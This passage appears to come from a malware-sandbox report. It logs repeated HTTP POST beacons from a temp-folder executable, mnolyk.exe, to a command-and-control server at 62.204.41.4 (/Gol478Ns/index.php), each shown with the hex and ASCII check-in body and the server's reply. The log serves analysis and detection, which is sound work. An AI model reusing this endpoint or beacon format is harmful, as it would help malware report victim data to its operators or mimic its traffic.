                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    504192.168.2.35020762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:44.645255089 CET704OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:44.711065054 CET704INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    505192.168.2.35020862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:44.891091108 CET705OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:44.956182957 CET705INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    506192.168.2.35020962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:45.134670019 CET706OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:45.201533079 CET706INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    507192.168.2.35021062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:45.381774902 CET707OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:45.448935032 CET707INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    508192.168.2.35021162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:45.625368118 CET708OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:45.692518950 CET708INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    509192.168.2.35021262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:45.861932039 CET709OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:45.931252003 CET709INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    51192.168.2.34975362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.389091969 CET252OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.453413963 CET252INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    510192.168.2.35021362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.112683058 CET710OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.178411007 CET710INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    511192.168.2.35021462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.359244108 CET711OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.424200058 CET711INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    512192.168.2.35021562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.606174946 CET712OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.670124054 CET712INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    513192.168.2.35021662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:46.862529039 CET713OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:46.927639008 CET713INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    514192.168.2.35021762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.101357937 CET714OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.167072058 CET714INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    515192.168.2.35021862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.347487926 CET715OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.412645102 CET715INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    516192.168.2.35021962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.609047890 CET716OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.675343037 CET716INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    517192.168.2.35022062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:47.855829000 CET717OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:47.920484066 CET717INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    518192.168.2.35022162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.092669010 CET718OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.156487942 CET718INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    519192.168.2.35022262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.324981928 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.386904955 CET719INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    52192.168.2.34975462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:29.621346951 CET253OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:29.685875893 CET253INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    520192.168.2.35022362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.562670946 CET719OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:33:48.625063896 CET720INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:33:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    521192.168.2.35022462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:33:48.800409079 CET720OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
